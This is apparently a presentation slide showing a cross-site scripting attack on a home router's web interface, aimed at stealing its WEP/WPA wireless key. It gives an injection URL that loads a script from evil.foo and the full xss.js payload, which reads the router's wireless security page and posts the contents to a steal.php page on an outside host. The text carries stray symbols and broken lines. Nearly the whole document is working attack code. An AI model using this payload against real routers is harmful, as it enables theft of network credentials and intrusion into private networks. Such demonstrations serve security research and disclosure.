çSteal WEP/WPA key
¼Attack
URL: http://192.168.1.254/cgi/b/ic/connect/?url="><script%20src=http://evil.foo/xss.js></script><a%20b%3d
¼Payload (‘xss.js’)
¼ document.write("<body>");
var req; var
url="/cgi/b/_wli_/seccfg/?ce=1&be=1&l0=4&l1=0";
¼ function loadXMLDoc(url) { [snip] }
¼ function processReqChange() {
¼ if (req.readyState == 4) {
¼ if (req.status == 200) {
¼ var f=document.createElement("form");
¼ f.name="myform";
¼ f.action="http://evil.domain.foo/bthh/steal.php";
¼ // POST is handy for submitting large chuncks of
data
¼
f.method="POST"; var
t = document.createElement('INPUT');
t.type='hidden';
t.name='data';
¼
t.value=escape(req.responseText);
f.appendChild(t);
document.body.appendChild(f);
¼ f.submit();
¼ }}}
¼ loadXMLDoc(url);
document.write("</body>");